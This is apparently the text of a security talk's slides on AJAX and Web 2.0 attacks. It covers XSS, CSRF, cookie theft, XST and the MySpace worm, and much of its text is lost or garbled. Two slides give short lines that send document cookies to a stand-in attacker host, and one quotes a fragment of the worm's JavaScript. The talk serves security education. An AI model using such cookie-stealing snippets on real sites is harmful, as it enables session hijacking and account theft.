AJAX Application Security, Alexander Kapranov
1. AJAX: Web 2.0 Security
- [email_address]
2.
- .. AJAX?
4.
- 1, 1, 1, 2;
- script kiddies.
5.
- 90% (UK, NTA Monitor).
- Google, 2 phpBB.
- CERT advisory on XSS, 02.02.2000; XSS in mail.li.ru, 30.
6.
- code, SQL injection
- OWASP Top Ten 2007.
7. Sokr.Ru:
8. http://myappsecurity.blogspot.com/
9. Hey, Jacks
- AJAX.
- XmlHttpRequest (Flash,
10. XSS (Cross Site Scripting)
- s.cgi?q=
- img1.src='evil.com?' + cookie;
- (Carnaval, AttackAPI)
- setTimeout loop + remote reqs, JS .com/control.cgi
12. XSS
- $text = q{a/;alert(42);/};
- HTML- !
13. CSRF (X Site Request Forgery)
- POST
14. CSRF
- JS
- JSON
- Gmail, 2006.
15. CSRF
- XmlHttpRequest * mhtml MSIE vuln = GET.
16. All your cookies are belong to us
- img1.src = 'http://.com/' + document.cookie;
- httponly cookies.
- XST.
- TRACE / HTTP/1.1, Cookies: XHR, squid
17.
- Click to Enter YOUR Bank!!
- XSS+AJAX = JavaScript, URL!
19. Javascript is the new shellcode
- MySpace worm, samy is my hero, 2004
- {var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O0){N+='&'}var
- OWASP 2007: XSS shell & SQL injections.
20.
- OpenID.
- XSS RSS.
- UGC (NetVibes).
- client-side persistence (visited links, cache).
21.
- Drive-by Pharming.
- MySpace worm, samy is my hero.
22. ?